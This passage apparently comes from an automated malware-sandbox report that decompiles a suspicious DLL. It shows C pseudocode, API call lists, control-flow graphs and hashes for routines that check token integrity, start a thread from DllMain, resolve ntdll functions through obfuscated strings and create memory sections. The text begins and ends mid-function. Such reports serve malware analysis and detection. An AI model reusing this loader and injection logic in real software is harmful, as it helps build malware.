                                          							 *_a4 = _t30;
                                          							 *_a8 = _t21;
                                          							_t28 = 0;
                                          						}
                                          					} else {
                                          						_t28 = 2;
                                          						L6:
                                          						CloseHandle(_t30);
                                          					}
                                          				}
                                          				return _t28;
                                          			}














                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00C74996,?,?,4D283A53,?,?), ref: 00C71A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00C71A70
                                          • _snwprintf.NTDLL ref: 00C71A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,00C7D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 00C71AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00C74996,?,?,4D283A53,?), ref: 00C71AC3
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00C71ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00C74996,?,?,4D283A53), ref: 00C71AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00C74996,?,?,4D283A53,?), ref: 00C71B03
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: e6894887132697e61bf8759ab1652dc0eca1be320e06ee379355739b7c70af55
                                          • Instruction ID: 569b6c96023efabfb8bd93b2c3565d575f94db2eb1cef39d3ffbe7bcbc4ec3c7
                                          • Opcode Fuzzy Hash: e6894887132697e61bf8759ab1652dc0eca1be320e06ee379355739b7c70af55
                                          • Instruction Fuzzy Hash: AD21F3B2600204BFC721EB68CC45F8E37B9AB84710F258164FA1DE6190EB70DA459B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 217 c753e3-c753fe 218 c75404-c7541d OpenProcessToken 217->218 219 c7549d-c754a9 217->219 220 c7541f-c7544a GetTokenInformation * 2 218->220 221 c7549c 218->221 222 c75492-c7549b CloseHandle 220->222 223 c7544c-c75459 call c758be 220->223 221->219 222->221 226 c75491 223->226 227 c7545b-c7546c GetTokenInformation 223->227 226->222 228 c7546e-c75488 GetSidSubAuthorityCount GetSidSubAuthority 227->228 229 c7548b-c7548c call c7147e 227->229 228->229 229->226
                                          C-Code - Quality: 100%
                                          			E00C753E3(long* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				long _v20;
                                          				int _t33;
                                          				void* _t46;
                                          
                                          				_v16 = 1;
                                          				_v20 = 0x2000;
                                          				if( *0xc7d25c > 5) {
                                          					_v16 = 0;
                                          					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                          						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                          						_v8 = 0;
                                          						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                          						if(_v8 != 0) {
                                          							_t46 = E00C758BE(_v8);
                                          							if(_t46 != 0) {
                                          								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                          								if(_t33 != 0) {
                                          									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                          								}
                                          								E00C7147E(_t46);
                                          							}
                                          						}
                                          						CloseHandle(_v12);
                                          					}
                                          				}
                                          				 *_a4 = _v20;
                                          				return _v16;
                                          			}










                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00C75415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00C75435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00C75445
                                          • CloseHandle.KERNEL32(00000000), ref: 00C75495
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00C75468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00C75470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00C75480
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 6dc44b5d8b999fe1a5b2d637d71294b809fc555eeedbdb144876f22660234c43
                                          • Instruction ID: ce3ca350dd5a1e6857fd53e3212281840e9142b7cd5d474b3bf07f12047c00b4
                                          • Opcode Fuzzy Hash: 6dc44b5d8b999fe1a5b2d637d71294b809fc555eeedbdb144876f22660234c43
                                          • Instruction Fuzzy Hash: F5213C75900219FFEB109FA4DC45EAEBF79EF44304F0080A5E515A6261C7719E85EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 231 5f1954-5f1968 232 5f19dd-5f19ea InterlockedDecrement 231->232 233 5f196a-5f196b 231->233 234 5f19ec-5f19f2 232->234 235 5f1a2a-5f1a31 232->235 233->235 236 5f1971-5f197e InterlockedIncrement 233->236 237 5f1a1e-5f1a24 HeapDestroy 234->237 238 5f19f4 234->238 236->235 239 5f1984-5f1998 HeapCreate 236->239 237->235 240 5f19f9-5f1a09 SleepEx 238->240 241 5f199a-5f19cf call 5f105a CreateThread 239->241 242 5f19d8-5f19db 239->242 243 5f1a0b-5f1a10 240->243 244 5f1a12-5f1a18 CloseHandle 240->244 241->235 247 5f19d1-5f19d4 241->247 242->235 243->240 243->244 244->237 247->242
                                          C-Code - Quality: 89%
                                          			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                          				struct _SECURITY_ATTRIBUTES* _v8;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				long _t9;
                                          				void* _t10;
                                          				void* _t18;
                                          				void* _t23;
                                          				void* _t36;
                                          
                                          				_push(__ecx);
                                          				_t9 = _a8;
                                          				_v8 = 1;
                                          				if(_t9 == 0) {
                                          					_t10 = InterlockedDecrement(0x5f4108);
                                          					__eflags = _t10;
                                          					if(_t10 == 0) {
                                          						__eflags =  *0x5f410c;
                                          						if( *0x5f410c != 0) {
                                          							_t36 = 0x2710;
                                          							while(1) {
                                          								SleepEx(0x64, 1);
                                          								__eflags =  *0x5f4118;
                                          								if( *0x5f4118 == 0) {
                                          									break;
                                          								}
                                          								_t36 = _t36 - 0x64;
                                          								__eflags = _t36;
                                          								if(_t36 > 0) {
                                          									continue;
                                          								}
                                          								break;
                                          							}
                                          							CloseHandle( *0x5f410c);
                                          						}
                                          						HeapDestroy( *0x5f4110);
                                          					}
                                          				} else {
                                          					if(_t9 == 1 && InterlockedIncrement(0x5f4108) == 1) {
                                          						_t18 = HeapCreate(0, 0x400000, 0); // executed
                                          						 *0x5f4110 = _t18;
                                          						_t41 = _t18;
                                          						if(_t18 == 0) {
                                          							L6:
                                          							_v8 = 0;
                                          						} else {
                                          							 *0x5f4130 = _a4;
                                          							asm("lock xadd [eax], ebx");
                                          							_t23 = CreateThread(0, 0, E005F103B, E005F105A(_a12, 0, 0x5f4118, _t41), 0,  &_a8); // executed
                                          							 *0x5f410c = _t23;
                                          							if(_t23 == 0) {
                                          								asm("lock xadd [esi], eax");
                                          								goto L6;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}













                                          APIs
                                          • InterlockedIncrement.KERNEL32(005F4108), ref: 005F1976
                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 005F198B
                                          • CreateThread.KERNEL32 ref: 005F19C2
                                          • InterlockedDecrement.KERNEL32(005F4108), ref: 005F19E2
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 005F19FC
                                          • CloseHandle.KERNEL32 ref: 005F1A18
                                          • HeapDestroy.KERNEL32 ref: 005F1A24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                          • String ID:
                                          • API String ID: 3416589138-0
                                          • Opcode ID: c3b32e3b1867429c54d6fe4311f4bf068daf0a770c5bd08f158c9957ca87a098
                                          • Instruction ID: 2848dee4a296c0122031a762c18b3377aad5b5fcf879bb03d44add9604b7998e
                                          • Opcode Fuzzy Hash: c3b32e3b1867429c54d6fe4311f4bf068daf0a770c5bd08f158c9957ca87a098
                                          • Instruction Fuzzy Hash: F021A931A00649EFD7109F68AC88D7A7FA8FBB5750710402AF641E3150EB7C8E84EF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 248 c7a060-c7a0a6 SysAllocString 249 c7a0ac-c7a0d9 248->249 250 c7a1ca-c7a1ce 248->250 256 c7a0df-c7a0eb call c7a872 249->256 257 c7a1c8 249->257 251 c7a1d0-c7a1d3 SafeArrayDestroy 250->251 252 c7a1d9-c7a1dd 250->252 251->252 254 c7a1df-c7a1e2 SysFreeString 252->254 255 c7a1e8-c7a1ee 252->255 254->255 256->257 260 c7a0f1-c7a101 256->260 257->250 260->257 262 c7a107-c7a12d IUnknown_QueryInterface_Proxy 260->262 262->257 264 c7a133-c7a147 262->264 266 c7a186-c7a18b 264->266 267 c7a149-c7a14d 264->267 269 c7a1bf-c7a1c4 266->269 270 c7a18d-c7a192 266->270 267->266 268 c7a14f-c7a166 StrStrIW 267->268 272 c7a17d-c7a180 SysFreeString 268->272 273 c7a168-c7a171 call c791b5 268->273 269->257 270->269 271 c7a194-c7a19f call c71295 270->271 276 c7a1a4-c7a1a8 271->276 272->266 273->272 279 c7a173-c7a17b call c7a872 273->279 276->269 278 c7a1aa-c7a1af 276->278 280 c7a1b1-c7a1b8 278->280 281 c7a1ba 278->281 279->272 280->269 281->269
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 00C7A09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00C7A11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 00C7A15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C7A180
                                            • Part of subcall function 00C791B5: SysAllocString.OLEAUT32(00C7C298), ref: 00C79205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 00C7A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C7A1E2
                                            • Part of subcall function 00C7A872: Sleep.KERNEL32(000001F4), ref: 00C7A8BA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: e2e4fb0d72a4f36fc5322c304a63fe657bf6e5d0b3e83a888bc654157ff636f8
                                          • Instruction ID: d1b5698d331aaf636b563c8909e915dc120b5442188d010edacb97ab2d3fdd3a
                                          • Opcode Fuzzy Hash: e2e4fb0d72a4f36fc5322c304a63fe657bf6e5d0b3e83a888bc654157ff636f8
                                          • Instruction Fuzzy Hash: C3513336500609EFDB01DFA8C844A9EB7B6FFC8750F148469E519EB220EB71ED45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 284 5f1f61-5f1f74 call 5f1026 287 5f1f7a-5f1faf GetModuleHandleA GetProcAddress 284->287 288 5f2036 284->288 289 5f202e-5f2034 call 5f1938 287->289 290 5f1fb1-5f1fc5 GetProcAddress 287->290 291 5f203d-5f2044 288->291 289->291 290->289 292 5f1fc7-5f1fdb GetProcAddress 290->292 292->289 294 5f1fdd-5f1ff1 GetProcAddress 292->294 294->289 296 5f1ff3-5f2007 GetProcAddress 294->296 296->289 297 5f2009-5f201b call 5f1a34 296->297 299 5f2020-5f2025 297->299 299->289 300 5f2027-5f202c 299->300 300->291
                                          C-Code - Quality: 100%
                                          			E005F1F61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr _v8;
                                          				_Unknown_base(*)()* _t28;
                                          				_Unknown_base(*)()* _t32;
                                          				_Unknown_base(*)()* _t35;
                                          				_Unknown_base(*)()* _t38;
                                          				_Unknown_base(*)()* _t41;
                                          				intOrPtr _t44;
                                          				struct HINSTANCE__* _t48;
                                          				intOrPtr _t54;
                                          
                                          				_t54 = E005F1026(0x20);
                                          				if(_t54 == 0) {
                                          					_v8 = 8;
                                          				} else {
                                          					_t48 = GetModuleHandleA( *0x5f4144 + 0x5f5014);
                                          					_v8 = 0x7f;
                                          					_t28 = GetProcAddress(_t48,  *0x5f4144 + 0x5f514c);
                                          					 *(_t54 + 0xc) = _t28;
                                          					if(_t28 == 0) {
                                          						L8:
                                          						E005F1938(_t54);
                                          					} else {
                                          						_t32 = GetProcAddress(_t48,  *0x5f4144 + 0x5f515c);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t35 = GetProcAddress(_t48,  *0x5f4144 + 0x5f516f);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t38 = GetProcAddress(_t48,  *0x5f4144 + 0x5f5184);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t41 = GetProcAddress(_t48,  *0x5f4144 + 0x5f519a);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E005F1A34(_t54, _a8); // executed
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}













                                          APIs
                                            • Part of subcall function 005F1026: HeapAlloc.KERNEL32(00000000,?,005F1329,00000208,?,-00000008,?,?,?,005F122F,?), ref: 005F1032
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,005F1B06,?,?,?,?,00000002,?,?), ref: 005F1F86
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F1FA8
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F1FBE
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F1FD4
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F1FEA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F2000
                                            • Part of subcall function 005F1A34: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 005F1A91
                                            • Part of subcall function 005F1A34: memset.NTDLL ref: 005F1AB3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 1632424568-0
                                          • Opcode ID: 81a4bb87834f69f5de39cd7187f86fdd6a25c13615bbf630cd1b2d1a9519ff7c
                                          • Instruction ID: d58b5e67ae6deb2e8eda3f2587ae4c516c0a54511d4714059167ae05e1b3f282
                                          • Opcode Fuzzy Hash: 81a4bb87834f69f5de39cd7187f86fdd6a25c13615bbf630cd1b2d1a9519ff7c
                                          • Instruction Fuzzy Hash: BC214DB160060A9FD721DF6ADD88E7ABBECBB14300B00445AE605D7261EB79F944CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 301 c77c75-c77c88 302 c77c8f-c77c93 StrChrA 301->302 303 c77c95-c77ca6 call c758be 302->303 304 c77c8a-c77c8e 302->304 307 c77ceb 303->307 308 c77ca8-c77cb4 StrTrimA 303->308 304->302 310 c77ced-c77cf4 307->310 309 c77cb6-c77cbf StrChrA 308->309 311 c77cd1-c77cdd 309->311 312 c77cc1-c77ccb StrTrimA 309->312 311->309 313 c77cdf-c77ce9 311->313 312->311 313->310
                                          C-Code - Quality: 54%
                                          			E00C77C75(char* __eax) {
                                          				char* _t8;
                                          				intOrPtr _t12;
                                          				char* _t21;
                                          				signed int _t23;
                                          				char* _t24;
                                          				signed int _t26;
                                          				void* _t27;
                                          
                                          				_t21 = __eax;
                                          				_push(0x20);
                                          				_t23 = 1;
                                          				_push(__eax);
                                          				while(1) {
                                          					_t8 = StrChrA();
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_t23 = _t23 + 1;
                                          					_push(0x20);
                                          					_push( &(_t8[1]));
                                          				}
                                          				_t12 = E00C758BE(_t23 << 2);
                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                          				if(_t12 != 0) {
                                          					StrTrimA(_t21, 0xc7c28c); // executed
                                          					_t26 = 0;
                                          					do {
                                          						_t24 = StrChrA(_t21, 0x20);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0;
                                          							_t24 =  &(_t24[1]);
                                          							StrTrimA(_t24, 0xc7c28c);
                                          						}
                                          						_t2 = _t27 + 0x10; // 0x4d283a53
                                          						 *( *_t2 + _t26 * 4) = _t21;
                                          						_t26 = _t26 + 1;
                                          						_t21 = _t24;
                                          					} while (_t24 != 0);
                                          					_t6 = _t27 + 0x10; // 0x4d283a53
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                          				}
                                          				return 0;
                                          			}











                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,031395AC,?,?,?,00C74C85,031395AC,?,?,?,00C74A8B,?,?,?), ref: 00C77C8F
                                          • StrTrimA.SHLWAPI(?,00C7C28C,00000002,?,?,?,00C74C85,031395AC,?,?,?,00C74A8B,?,?,?,4D283A53), ref: 00C77CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,00C74C85,031395AC,?,?,?,00C74A8B,?,?,?,4D283A53,?), ref: 00C77CB9
                                          • StrTrimA.SHLWAPI(00000001,00C7C28C,?,?,?,00C74C85,031395AC,?,?,?,00C74A8B,?,?,?,4D283A53,?), ref: 00C77CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 180aebb6c0b4e4e05d82e043c11a32f7f69fbc1562aaef26c47fcf754b47acbb
                                          • Instruction ID: f625ba4e12ceb5e0ff3d20e05d711f48e7b7cfef25835a297413ed06e9b89096
                                          • Opcode Fuzzy Hash: 180aebb6c0b4e4e05d82e043c11a32f7f69fbc1562aaef26c47fcf754b47acbb
                                          • Instruction Fuzzy Hash: 7201B5716093265BD2229F668C88F2BBE9CEF59B60F118618F859C7251DB60C80192F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          control_flow_graph 314 c74908-c74922 call c711af 317 c74924-c74932 314->317 318 c74938-c74946 314->318 317->318 320 c74958-c74973 call c71111 318->320 321 c74948-c7494b 318->321 327 c74975-c7497b 320->327 328 c7497d 320->328 321->320 322 c7494d-c74952 321->322 322->320 324 c74adb 322->324 326 c74add-c74ae2 324->326 329 c74983-c74998 call c71ec4 call c71a4e 327->329 328->329 334 c749a3-c749a9 329->334 335 c7499a-c7499d CloseHandle 329->335 336 c749cf-c749e7 call c758be 334->336 337 c749ab-c749b0 334->337 335->334 345 c74a13-c74a15 336->345 346 c749e9-c74a11 memset RtlInitializeCriticalSection 336->346 339 c74ac6-c74acb 337->339 340 c749b6 337->340 342 c74ad3-c74ad9 339->342 343 c74acd-c74ad1 339->343 344 c749b9-c749c8 call c77827 340->344 342->326 343->326 343->342 352 c749ca 344->352 348 c74a16-c74a1a 345->348 346->348 348->339 351 c74a20-c74a36 RtlAllocateHeap 348->351 353 c74a66-c74a68 351->353 354 c74a38-c74a64 wsprintfA 351->354 352->339 355 c74a69-c74a6d 353->355 354->355 355->339 356 c74a6f-c74a8f call c793d5 call c798f7 355->356 356->339 361 c74a91-c74a98 call c7205b 356->361 364 c74a9f-c74aa6 361->364 365 c74a9a-c74a9d 361->365 366 c74abb-c74abf call c79b6f 364->366 367 c74aa8-c74aaa 364->367 365->339 371 c74ac4 366->371 367->339 368 c74aac-c74ab0 call c76cd3 367->368 372 c74ab5-c74ab9 368->372 371->339 372->339 372->366
                                          C-Code - Quality: 57%
                                          			E00C74908(signed int __edx) {
                                          				signed int _v8;
                                          				long _v12;
                                          				CHAR* _v16;
                                          				long _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t21;
                                          				CHAR* _t22;
                                          				CHAR* _t25;
                                          				intOrPtr _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          				void* _t32;
                                          				CHAR* _t36;
                                          				CHAR* _t42;
                                          				CHAR* _t43;
                                          				CHAR* _t44;
                                          				CHAR* _t46;
                                          				void* _t49;
                                          				void* _t51;
                                          				signed char _t56;
                                          				intOrPtr _t58;
                                          				signed int _t59;
                                          				void* _t63;
                                          				CHAR* _t67;
                                          				CHAR* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          
                                          				_t61 = __edx;
                                          				_v20 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_t21 = E00C711AF();
                                          				if(_t21 != 0) {
                                          					_t59 =  *0xc7d25c; // 0x2000000a
                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                          					 *0xc7d25c = (_t59 & 0xf0000000) + _t21;
                                          				}
                                          				_t22 =  *0xc7d164(0, 2); // executed
                                          				_v16 = _t22;
                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                          					_t25 = E00C71111( &_v8,  &_v20); // executed
                                          					_t54 = _t25;
                                          					_t26 =  *0xc7d2a4; // 0x24ba5a8
                                          					if( *0xc7d25c > 5) {
                                          						_t8 = _t26 + 0xc7e5cd; // 0x4d283a53
                                          						_t27 = _t8;
                                          					} else {
                                          						_t7 = _t26 + 0xc7ea05; // 0x44283a44
                                          						_t27 = _t7;
                                          					}
                                          					E00C71EC4(_t27, _t27);
                                          					_t31 = E00C71A4E(_t61,  &_v20,  &_v12); // executed
                                          					if(_t31 == 0) {
                                          						CloseHandle(_v20);
                                          					}
                                          					_t63 = 5;
                                          					if(_t54 != _t63) {
                                          						 *0xc7d270 =  *0xc7d270 ^ 0x81bbe65d;
                                          						_t32 = E00C758BE(0x60);
                                          						 *0xc7d324 = _t32;
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							_push(8);
                                          							_pop(0);
                                          						} else {
                                          							memset(_t32, 0, 0x60);
                                          							_t49 =  *0xc7d324; // 0x31395b0
                                          							_t70 = _t70 + 0xc;
                                          							__imp__(_t49 + 0x40);
                                          							_t51 =  *0xc7d324; // 0x31395b0
                                          							 *_t51 = 0xc7e845;
                                          						}
                                          						_t54 = 0;
                                          						__eflags = 0;
                                          						if(0 == 0) {
                                          							_t36 = RtlAllocateHeap( *0xc7d238, 0, 0x43);
                                          							 *0xc7d2c4 = _t36;
                                          							__eflags = _t36;
                                          							if(_t36 == 0) {
                                          								_push(8);
                                          								_pop(0);
                                          							} else {
                                          								_t56 =  *0xc7d25c; // 0x2000000a
                                          								_t61 = _t56 & 0x000000ff;
                                          								_t58 =  *0xc7d2a4; // 0x24ba5a8
                                          								_t13 = _t58 + 0xc7e55a; // 0x697a6f4d
                                          								_t55 = _t13;
                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xc7c28f);
                                          							}
                                          							_t54 = 0;
                                          							__eflags = 0;
                                          							if(0 == 0) {
                                          								asm("sbb eax, eax");
                                          								E00C793D5( ~_v8 &  *0xc7d270, 0xc7d00c); // executed
                                          								_t42 = E00C798F7(0, _t55, _t63, 0xc7d00c); // executed
                                          								_t54 = _t42;
                                          								__eflags = _t54;
                                          								if(_t54 != 0) {
                                          									goto L30;
                                          								}
                                          								_t43 = E00C7205B(_t55); // executed
                                          								__eflags = _t43;
                                          								if(_t43 != 0) {
                                          									__eflags = _v8;
                                          									_t67 = _v12;
                                          									if(_v8 != 0) {
                                          										L29:
                                          										_t44 = E00C79B6F(_t61, _t67, _v8); // executed
                                          										_t54 = _t44;
                                          										goto L30;
                                          									}
                                          									__eflags = _t67;
                                          									if(__eflags == 0) {
                                          										goto L30;
                                          									}
                                          									_t46 = E00C76CD3(__eflags,  &(_t67[4])); // executed
                                          									_t54 = _t46;
                                          									__eflags = _t54;
                                          									if(_t54 == 0) {
                                          										goto L30;
                                          									}
                                          									goto L29;
                                          								}
                                          								_t54 = 8;
                                          							}
                                          						}
                                          					} else {
                                          						_t68 = _v12;
                                          						if(_t68 == 0) {
                                          							L30:
                                          							if(_v16 == 0 || _v16 == 1) {
                                          								 *0xc7d160();
                                          							}
                                          							goto L34;
                                          						}
                                          						_t69 =  &(_t68[4]);
                                          						do {
                                          						} while (E00C77827(_t63, _t69, 0, 1) == 0x4c7);
                                          					}
                                          					goto L30;
                                          				} else {
                                          					_t54 = _t22;
                                          					L34:
                                          					return _t54;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 00C711AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,00C74920,00000001), ref: 00C711BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00C7499D
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • memset.NTDLL ref: 00C749ED
                                          • RtlInitializeCriticalSection.NTDLL(03139570), ref: 00C749FE
                                            • Part of subcall function 00C76CD3: memset.NTDLL ref: 00C76CED
                                            • Part of subcall function 00C76CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00C76D24
                                            • Part of subcall function 00C76CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C74AB5), ref: 00C76D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00C74A29
                                          • wsprintfA.USER32 ref: 00C74A59
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp
